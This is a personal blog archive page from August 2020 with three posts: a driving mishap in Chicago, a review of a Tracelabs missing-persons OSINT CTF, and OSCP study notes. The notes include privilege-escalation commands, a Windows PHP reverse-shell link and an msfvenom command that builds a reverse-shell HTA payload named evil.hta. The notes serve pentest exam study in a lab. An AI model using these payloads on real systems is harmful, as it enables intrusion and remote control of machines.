Posts

Showing posts from August, 2020

Going back to School... Driving School

Image
 After going the wrong way on a one-way, I decided driving school was for me. It happened on a dark night when I did my bi-weekly visit from Cleveland to Chicago. I visited a handful of times before I moved. My favorite parking garage is on Kinzie street and I don't fix what isn't broken. I changed hotels and this hotel had a 24/7 in-out garage access. I was REALLY hungry and it was 10pm and dark outside. A McDonalds was 0.4 miles away. I thought HEY this shouldn't be bad at all, I'm gonna drive to this McDonalds. I should be safe in my car! Well out of the 5-6 times I've been to Chicago, it never occured to me that one-ways ever existed. I rode on a Divie bike and wondered why all the bikes went in the same direction.. they went out to Lincoln park on Dearborn but never came back up. Until I saw people going the wrong way lol. That was my only inkling that something was off about these roads. Back to the McDonalds story.. I programmed McDonalds

Tracelabs Global Missings Person CTF: Defcon Edition

Image
Review The monthly Tracelabs Global Missing Persons CTF was on August 8, 2020. Tracelabs partnered with the annual Defcon Hackers conference. We worked on eight missing persons cases. I submitted 36 flags. 28 were approved and 7 were rejected. 36/6 hours = 6 flag submissions per hour. I wanted to submit 50 flags and fell short! I would start my watch and mark on a notecard how much I submitted. Couldn't go fast enough. Some cases were hard to find information on. One person I couldn't find anything. No Facebook, Instagram, Tiktok, nothing. It didn't help there were 1000s of them with the same name! The 7 others I found something on. I had two favorite cases. For one of them, I found a secret West Coast LinkedIn from an adult missing on the East Coast. He had his face down, with the same name, same previous job, looked very much the same from the ears and chin. I took an email from LinkedIn and found a property. I submitted the property as a location flag (jack

August OSCP Notes

August 4, 2020 sudo -u scriptmanager /bin/bash /bin/bash -i Sherlock for Windows. linuxprivcheck for Linux. Domain Controller (DC) is head honcho of Active Directory Check crontab to see if root is running anything sudo -l to see what you can do August 19, 2020 https://www.youtube.com/watch?v=5Tlx7D2djes Delete all your snapshots. Use gparted. Delete anything in the middle. Slide over. c:\windows\system32\drivers\etc\hosts <- Use this for LFI (Local file inclusion check for windows os) August 20, 2020 https://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/Reverse%20Shell.php (Has worked before > php -S 0.0.0.0:80 exists like python -m SimpleHttpServer 80 ruby -run -e httpd . -p 9000 August 22, 2020 Can create HTA files to execute in Internet Explorer sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta August 23, 2020 nmap --script vuln -p139,445 192.168.